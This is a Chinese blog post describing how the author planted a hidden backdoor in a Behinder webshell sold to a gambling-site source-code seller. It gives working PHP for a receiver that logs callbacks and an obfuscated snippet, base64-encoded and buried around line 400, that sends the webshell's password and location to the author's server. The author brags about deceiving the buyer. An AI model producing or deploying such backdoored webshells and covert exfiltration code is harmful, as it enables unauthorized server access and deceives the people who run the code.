黑吃黑吃黑Bc源码老板的艰难道路

释放双眼,带上耳机,听听看~!
黑吃黑吃黑BC源码老板的道路任重而道远.........

0x01前言

感谢To1y5师傅的技术支持~

——————————————————————————华丽分割

首先呢,这个老板是出售bc源码的,然后想黑吃黑bc老板,所以他需要一个免杀的马子,我左思右想可以啊,J0师傅发的那个冰蝎马可以混过去,然后灵机一动觉得可以黑吃黑吃黑一波……

这很不道德

——————————————————————————-华丽分割

0x02 加工冰蝎马

01.先写一个收信端

这里借一下To1y5师傅写好的探针:

原理:php文件记录访问ip

那该怎么写呢,首先定义一个记录ip的函数

function IP() {
        if (getenv('HTTP_CLIENT_IP')) {
        $ip = getenv('HTTP_CLIENT_IP');
        }
        elseif (getenv('HTTP_X_FORWARDED_FOR')) {
        $ip = getenv('HTTP_X_FORWARDED_FOR');
        }
        elseif (getenv('HTTP_X_FORWARDED')) {
        $ip = getenv('HTTP_X_FORWARDED');
        }
        elseif (getenv('HTTP_FORWARDED_FOR')) {
        $ip = getenv('HTTP_FORWARDED_FOR');

        }
        elseif (getenv('HTTP_FORWARDED')) {
        $ip = getenv('HTTP_FORWARDED');
        }
        else {
        $ip = $_SERVER['REMOTE_ADDR'];
        }
        return $ip;
    }
//然后把获取的ip输出
$ip = IP();
date_default_timezone_set("Asia/Shanghai");//设置时区
$time = date("Y.m.d,h:i:sa");//为了方便还是加个日期吧
$txt = 'ip:'.$ip."rn".'time:'.$time."rn"."rn";//拼接
$op = fopen('ip'.'.txt','a+');//整个ip.txt 
fwrite($op,$txt);//给爷写进去
fclose($op);//给爷关了

这个就是相当于xss平台的接收端,下面看一下效果图,这里因为没有配合发信端所以只有.txt,配合发信端的话就是马子的密码就是txt文件名,发信端后面写:

收信端

现在写好了收信端,下面加工冰蝎马写发信端。

02.在冰蝎马里加后门

$self = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];//接收马子的地址
$salt = base64_decode('aHR0cCUzQS8vMTI3LjAuMC4xL2lwLnBocCUzRmlkJTNE');
//http://127.0.0.1/ip.php?id=
$uid = '&uid=';
$url = urldecode($salt.$password.$uid.$self);//拼接url  
//http://127.0.0.1/ip.php?id=$password&uid=http://127.0.0.1/ip.php
$fp= fopen($url,'r');//访问$url

这样加在冰蝎马里,看一下成品,如果怕被发现可以进行一下php加密,但我觉得这个老板是个白痴,懒得加密了,直接base64加密一下地址就行辣,然后我把发信端藏到了400行 哈哈哈哈:

发信端部分

3.大功告成,

把发信端放到自己的外网服务器上,然后把马子发给了老板直接就人在家中坐shell从天上来了,本地测试了一下达到了预期效果,直接发给了老板,嘻嘻。

本地测试

0x03结尾

虽然这很不道德但我还是发给了他,希望他能引以为戒,商人应该诚信,从我做起!

引以为戒

放一下收信端的源码吧,轻点喷,菜的要死,老千层饼了~

隐藏内容,您需要满足以下条件方可查看
End
WEB安全数据安全

浅谈PHP随机数安全的分析

2020-5-17 15:35:12

WEB安全

钓鱼网站代码审计

2020-5-28 15:59:34

4 条回复 A文章作者 M管理员
  1. 你真秀啊。

  2. zhe

  3. 收信端源码无了

    • 有啊 看后面的链接https:/share.weiyun.com/xOBFnnTY

个人中心
购物车
优惠劵
有新私信 私信列表
搜索